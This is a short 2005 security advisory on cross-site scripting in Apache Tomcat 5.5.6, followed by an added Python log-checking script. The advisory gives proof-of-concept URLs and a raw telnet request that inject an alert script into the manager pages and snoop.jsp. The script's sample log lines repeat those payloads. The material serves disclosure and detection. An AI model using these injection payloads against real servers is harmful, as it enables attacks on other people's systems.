Apache Tomcat version 5.5.6 has cross-site scripting vulnerabilities affecting multiple platforms.
Apache Jakarta Tomcat Cross Site Scripting Vulnerabilities
===========================================================

Version
========
Apache Tomcat/5.5.6 running on Windows 2000
(Other platforms may also be affected)

Exploiting
===========
http://192.168.0.23:8080/manager/html/<script>alert("Hallo")</script>
http://192.168.0.23:8080/manager/html/stop?path=<script>alert("Hallo")</script>
http://192.168.0.23:8080/manager/html/start?path=<script>alert("Hallo")</script>

Second one works without authentication, but should not be that easy to exploit:
Telnet to port 8080 and paste the following:
<script>alert("Hallo")</script> /jsp-examples/snp/snoop.jsp HTTP/1.0

Vendor
======
http://jakarta.apache.org

Patch
=====
http://www.mail-archive.com/[email protected]/msg66978.html

Discovered
==========
03.Jan.2005
oliver karow
http://www.oliverkarow.de/research/jakarta556_xss.txt
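
A log check for the request shapes listed in this advisory, as an added example that is not part of the original advisory. It assumes the Tomcat access log uses the common pattern (`%h %l %u %t "%r" %s %b`); the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
# The greedy (.*) keeps quotes that appear inside the request line itself.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*)" (\d{3}) \S+$')
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")   # RFC 7230 method token
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]")               # start of an HTML tag


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LINE.match(line)
    if not m:
        return ["unparsed-line"]
    parts = m.group(2).rsplit(" ", 2)       # method, target, protocol
    if len(parts) != 3:
        return ["malformed-request-line"]
    method, target, _proto = parts
    findings = []
    if not TOKEN.match(method):             # markup sent where the method belongs
        findings.append("method-not-token")
    if MARKUP.search(decode(target)):       # markup in the path or query string
        findings.append("markup-in-target")
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '10.0.0.5 - admin [03/Jan/2005:10:00:00 +0100] "GET /manager/html/list HTTP/1.1" 200 5120',
    '10.0.0.9 - admin [03/Jan/2005:10:00:05 +0100] "GET /manager/html/stop?path=%3Cscript%3Ealert(%22Hallo%22)%3C/script%3E HTTP/1.1" 200 4870',
    '10.0.0.9 - admin [03/Jan/2005:10:00:07 +0100] "GET /manager/html/%253Cscript%253E HTTP/1.1" 200 4801',
    '10.0.0.9 - - [03/Jan/2005:10:00:09 +0100] "<script>alert("Hallo")</script> /jsp-examples/snp/snoop.jsp HTTP/1.0" 200 913',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(inspect(entry), entry)
```

The method check catches the unauthenticated snoop.jsp case, which never shows markup in the URL and is missed by filters that look only at the path and query string.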